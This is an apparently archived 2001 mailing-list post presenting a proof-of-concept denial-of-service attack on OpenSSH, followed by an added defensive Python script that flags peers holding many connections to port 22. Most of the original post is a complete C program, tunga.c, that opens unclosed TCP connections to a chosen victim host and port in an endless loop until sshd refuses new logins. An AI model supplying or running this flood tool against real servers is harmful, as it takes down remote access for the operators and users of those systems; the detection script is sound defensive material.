--[ OpenSSH DoS Attack proof of concept ]--

by DrBrain <drbrainat_private> / http://www.phibernet.org

--[ Intro ]--

After some tests with sshd, I have noticed that it is possible to generate a DoS attack that gives you the following message when you try to contact the service:

----------
$ ssh userat_private
ssh_exchange_identification: Connection closed by remote host
----------

This just happens while running the code below, because when you stop running it everything works fine.

It seems to be a known problem ( http://www.snailbook.com/faq/libwrap-oops.auto.html ), but until now there is no patch available and this problem is present in all OpenSSH versions. However, there is an advisory to compile the SSH server with libwrap (TCP-wrappers) support and then add some rules in /etc/hosts.{allow,deny} in order to allow connections to sshd from any source address.

Anyway, I have made some tests and ALL the machines were vulnerable. In my opinion it is urgent to fix this as soon as possible.
--[ Code ]--

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>   /* exit(), atoi() */
#include <string.h>   /* memcpy() */
#include <unistd.h>

int main (int argc, char *argv[]) {

  int sd, rc;
  struct sockaddr_in localAddr, servAddr;
  struct linger ling;
  struct hostent *h;

  if(argc < 3) {
    printf("tunga.c - OpenSSH DoS Attack\n");
    printf("by DrBrain <drbrainat_private>\n");
    printf("Phibernet Information Network < http://www.phibernet.org >\n\n");
    printf("Usage: %s <victim> <port>\n\n",argv[0]);
    exit(1);
  }

  h = gethostbyname(argv[1]);
  if(h==NULL) {
    printf("%s: Unknown Host '%s'\n",argv[0],argv[1]);
    exit(1);
  }

  /* Each pass opens a new TCP connection; the sockets are never closed. */
  for(;;) {
    servAddr.sin_family = h->h_addrtype;
    memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
    servAddr.sin_port = htons(atoi(argv[2]));

    sd = socket(AF_INET, SOCK_STREAM, 0);
    if(sd<0) {
      perror("Cannot Open Socket ");
      exit(1);
    }

    rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
    if(rc<0) {
      perror("Cannot Connect ");
      exit(1);
    }
  }

  exit(0);
}

That's it!

I would like to thank megas and FatZU and all the guys in Phibernet for helping me with some machines while testing the DoS.

--
DrBrain
"If you don't have a hammer, hack it" ;)
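
Added example, not part of the original post: a defender-side check for the condition described above. It counts established connections per peer address to the sshd port in `ss -tn`-style output and flags peers above a threshold. The sample lines, the addresses, the threshold of 5 and the function names are constructed for illustration.

```python
from collections import Counter

# Constructed sample in the column layout of `ss -tn`; not captured from a real host.
SAMPLE_SS_OUTPUT = "\n".join(
    ["State Recv-Q Send-Q Local Address:Port Peer Address:Port"]
    + [f"ESTAB 0 0 192.0.2.10:22 198.51.100.7:{40000 + i}" for i in range(8)]
    + [
        "ESTAB 0 0 192.0.2.10:22 203.0.113.5:51514",
        "ESTAB 0 0 [2001:db8::1]:22 [2001:db8::9]:40100",
        "ESTAB 0 0 [2001:db8::1]:22 [2001:db8::9]:40101",
        "ESTAB 0 0 192.0.2.10:443 198.51.100.7:40200",   # other service, ignored
        "TIME-WAIT 0 0 192.0.2.10:22 198.51.100.7:40300",  # not established, ignored
    ]
)


def split_endpoint(endpoint):
    """Split 'addr:port' or '[v6addr]:port' into (addr, port)."""
    addr, _, port = endpoint.rpartition(":")
    return addr.strip("[]"), port


def connections_per_peer(ss_output, service_port="22"):
    """Count ESTAB connections to service_port, keyed by peer address."""
    counts = Counter()
    for line in ss_output.splitlines():
        fields = line.split()
        # Skip the header, short lines and any state other than ESTAB.
        if len(fields) < 5 or fields[0] != "ESTAB":
            continue
        _, local_port = split_endpoint(fields[3])
        peer_addr, _ = split_endpoint(fields[4])
        if local_port == service_port:
            counts[peer_addr] += 1
    return counts


def flag_flooders(ss_output, threshold=5, service_port="22"):
    """Return {peer: count} for peers holding more than `threshold` connections."""
    counts = connections_per_peer(ss_output, service_port)
    return {peer: n for peer, n in counts.items() if n > threshold}


if __name__ == "__main__":
    for peer, n in flag_flooders(SAMPLE_SS_OUTPUT).items():
        print(f"{peer} holds {n} established connections to port 22")
```

The threshold is an assumed value; set it from the normal number of simultaneous sessions a single client opens to the host.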
This archive was generated by hypermail 2b30 : Mon Dec 10 2001 - 16:56:29 PST